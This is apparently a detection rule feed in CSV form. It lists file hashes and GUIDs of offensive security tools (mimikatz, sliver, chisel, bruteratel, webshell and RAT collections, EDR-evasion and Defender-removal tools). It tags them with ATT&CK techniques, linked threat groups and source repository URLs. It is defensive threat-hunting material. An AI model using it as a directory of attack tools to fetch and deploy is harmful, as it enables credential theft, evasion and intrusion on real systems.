"*a6176293011e6a61923c609c63925c47b0f1f9b5465b451148e4813969d850b8*",".{0,1000}a6176293011e6a61923c609c63925c47b0f1f9b5465b451148e4813969d850b8.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32582"
"*a622eda2b4d3ea644a4563610e594e8e192d79ab2a135c6a4fd2e3f4a707f1b5*",".{0,1000}a622eda2b4d3ea644a4563610e594e8e192d79ab2a135c6a4fd2e3f4a707f1b5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32583"
"*A62776D0-CF96-4067-B4BE-B337AB6DFF02*",".{0,1000}A62776D0\-CF96\-4067\-B4BE\-B337AB6DFF02.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#GUIDproject","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","32584"
"*a62e9af706a0c4c9ebb26a1d33e4b5de10fb07f00e4e03699fa5038dbe479c92*",".{0,1000}a62e9af706a0c4c9ebb26a1d33e4b5de10fb07f00e4e03699fa5038dbe479c92.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32585"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32586"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32587"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32588"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32589"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32590"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32591"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32592"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32593"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32594"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32595"
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32596"
"*a63a403167d39341c7a116a1f8d599d19859743cbb254ba6203733213081913f*",".{0,1000}a63a403167d39341c7a116a1f8d599d19859743cbb254ba6203733213081913f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32597"
"*a63bf8aa62471b0cb62919e6e387482895a8027d5f763aba5f76572a595d7a31*",".{0,1000}a63bf8aa62471b0cb62919e6e387482895a8027d5f763aba5f76572a595d7a31.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","#filehash","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","32599"
"*a63e1dbd23bbc640410dd811ab84e179b741080c4b4d8b5e08e5622d79884e38*",".{0,1000}a63e1dbd23bbc640410dd811ab84e179b741080c4b4d8b5e08e5622d79884e38.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32600"
"*a642aacd4cfc3cbee64a1989d7ae19f8fe8eb99c77292186c98d477c6846e300*",".{0,1000}a642aacd4cfc3cbee64a1989d7ae19f8fe8eb99c77292186c98d477c6846e300.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32601"
"*a644596787f407d005d3de5a3e02316c788b40dec8c5fdd0b4c010edc771677f*",".{0,1000}a644596787f407d005d3de5a3e02316c788b40dec8c5fdd0b4c010edc771677f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32602"
"*a6465053e2254234650641bb53a2d2f3596439199a8496d724332b7f6d54d5b3*",".{0,1000}a6465053e2254234650641bb53a2d2f3596439199a8496d724332b7f6d54d5b3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32604"
"*a6479f37d1ab80d878c949e10b1b44cd7714c87a67da40c438237af0501de51f*",".{0,1000}a6479f37d1ab80d878c949e10b1b44cd7714c87a67da40c438237af0501de51f.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#filehash","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","32605"
"*A6497C83-7DC7-4E48-87BA-FB5DFAABE3C9*",".{0,1000}A6497C83\-7DC7\-4E48\-87BA\-FB5DFAABE3C9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32606"
"*a64ce5fa2df81f51e5f477e07f2d5f4c59f9fb045e575a497c2d206233c2f118*",".{0,1000}a64ce5fa2df81f51e5f477e07f2d5f4c59f9fb045e575a497c2d206233c2f118.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32607"
"*A64EF001-BE90-4CF5-86B2-22DFDB49AE81*",".{0,1000}A64EF001\-BE90\-4CF5\-86B2\-22DFDB49AE81.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","32608"
"*a650ad2f9d7d9ee450f8fd0926b0ec9512d02f2fbd96f4338549f5064519f9e6*",".{0,1000}a650ad2f9d7d9ee450f8fd0926b0ec9512d02f2fbd96f4338549f5064519f9e6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32609"
"*a65acb163d08410f58a84447f9a615c45219343e637a1853dc29a2e79ff2f112*",".{0,1000}a65acb163d08410f58a84447f9a615c45219343e637a1853dc29a2e79ff2f112.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32610"
"*a65b022127a9e19bdb6e119e020cf70a89c4d59a156b8040d74a8f489dc490c2*",".{0,1000}a65b022127a9e19bdb6e119e020cf70a89c4d59a156b8040d74a8f489dc490c2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32611"
"*a65b022127a9e19bdb6e119e020cf70a89c4d59a156b8040d74a8f489dc490c2*",".{0,1000}a65b022127a9e19bdb6e119e020cf70a89c4d59a156b8040d74a8f489dc490c2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32612"
"*A663D4C5-BC01-42A6-9C65-52F0524B4AB7*",".{0,1000}A663D4C5\-BC01\-42A6\-9C65\-52F0524B4AB7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32614"
"*a6700f4b04050a66b236f7af62999e865573a72c876b6de8d31dfebb47991f1d*",".{0,1000}a6700f4b04050a66b236f7af62999e865573a72c876b6de8d31dfebb47991f1d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32616"
"*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*",".{0,1000}a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","32617"
"*a67543b2c8434f6af3224b63e88885c68981e8145729c815505d18d31f0a49ac*",".{0,1000}a67543b2c8434f6af3224b63e88885c68981e8145729c815505d18d31f0a49ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32618"
"*a67edb34ce2c10bb5c170445344da4ad809932ff8e82e2b6c45a260d5a47a859*",".{0,1000}a67edb34ce2c10bb5c170445344da4ad809932ff8e82e2b6c45a260d5a47a859.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#filehash","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","32620"
"*a681dd702f47215b0bf02a6f100f677d006f1e674c56519e39b888dd78779b40*",".{0,1000}a681dd702f47215b0bf02a6f100f677d006f1e674c56519e39b888dd78779b40.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32621"
"*a6ac2ea4562765fec4f8a9648b57983ea620dd93122567d3db8e996ea14194f1*",".{0,1000}a6ac2ea4562765fec4f8a9648b57983ea620dd93122567d3db8e996ea14194f1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32623"
"*a6b199a57d6b2f7bc067e6dfa8433f8236b51e43a171b262289a948d6ea43472*",".{0,1000}a6b199a57d6b2f7bc067e6dfa8433f8236b51e43a171b262289a948d6ea43472.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32626"
"*a6b59942fdee9a1b50b37f53a44b22de11cf97dd48828495cb6da46bc00378de*",".{0,1000}a6b59942fdee9a1b50b37f53a44b22de11cf97dd48828495cb6da46bc00378de.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","0","#filehash","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","32627"
"*a6d05bbe01016498df38a529495f160b8fae84d8d325811e205da5300679daf4*",".{0,1000}a6d05bbe01016498df38a529495f160b8fae84d8d325811e205da5300679daf4.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32629"
"*a6f37544d43d1d50d3a860e72e723079bb1fc7f7e956089cade9b41d1a585c2f*",".{0,1000}a6f37544d43d1d50d3a860e72e723079bb1fc7f7e956089cade9b41d1a585c2f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32636"
"*a6f4ff21424c038ace4944d8330ba61a0f87dfa953faf7349992ef08a04f5bdf*",".{0,1000}a6f4ff21424c038ace4944d8330ba61a0f87dfa953faf7349992ef08a04f5bdf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32638"
"*a6f73c1a75d14322aa4993fe498299ab55866ba74440f8a52d4dffe85594de2f*",".{0,1000}a6f73c1a75d14322aa4993fe498299ab55866ba74440f8a52d4dffe85594de2f.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32639"
"*A6F8500F-68BC-4EFC-962A-6C6E68D893AF*",".{0,1000}A6F8500F\-68BC\-4EFC\-962A\-6C6E68D893AF.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#GUIDproject","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","32640"
"*a6fa0c8acd7fae1a71d6f623caf345eb427b40db045c081f394b0e67e9bc14a5*",".{0,1000}a6fa0c8acd7fae1a71d6f623caf345eb427b40db045c081f394b0e67e9bc14a5.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","32641"
"*a6fa768c4964c328c748558627c20c2ba455e589a1b87cfa3911d197da1688d2*",".{0,1000}a6fa768c4964c328c748558627c20c2ba455e589a1b87cfa3911d197da1688d2.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32642"
"*a6fb80cdc98d67bc7276ea726507b34ebb741345ff6b61973580c25bc1fa84dc*",".{0,1000}a6fb80cdc98d67bc7276ea726507b34ebb741345ff6b61973580c25bc1fa84dc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32643"
"*a6fe51ded3889aaf77c7b55814220c6e2ba19fac731f4387c472713d3b454dca*",".{0,1000}a6fe51ded3889aaf77c7b55814220c6e2ba19fac731f4387c472713d3b454dca.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","32644"
